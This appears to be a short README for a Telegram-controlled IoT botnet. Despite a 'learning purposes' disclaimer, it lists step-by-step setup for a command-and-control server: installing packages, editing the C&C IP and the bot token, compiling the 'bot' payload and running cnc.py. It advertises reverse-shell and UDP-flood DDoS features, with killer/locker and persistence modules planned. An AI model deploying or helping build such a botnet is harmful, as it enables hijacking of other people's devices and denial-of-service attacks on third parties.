Telegram IOT Botnet was created for learning purposes. Please do not use for malicious purposes!
- C&C Server need VPS Ubuntu 20.04 (1GB 1 CORES ITS OK LOL)
apt-get update -y
apt-get upgrade -y
apt-get install gcc python3 python3-pip -y
pip3 install python-telegram-bot threading
- Edit IP server in main.c
- Edit Telegram Bot Token in cnc.py
- gcc bot/*.c -o bot
- python3 cnc.py
- "bot" is payload file
- Reverse Shell
- DDoS (udpflood, soon)
- Ensure Bots (soon)
- Killer & Locker (soon)
- If you have ideas, create Issue and write its. Thanks you ❤️
- hoaan1995
- 0.1
- Initial Release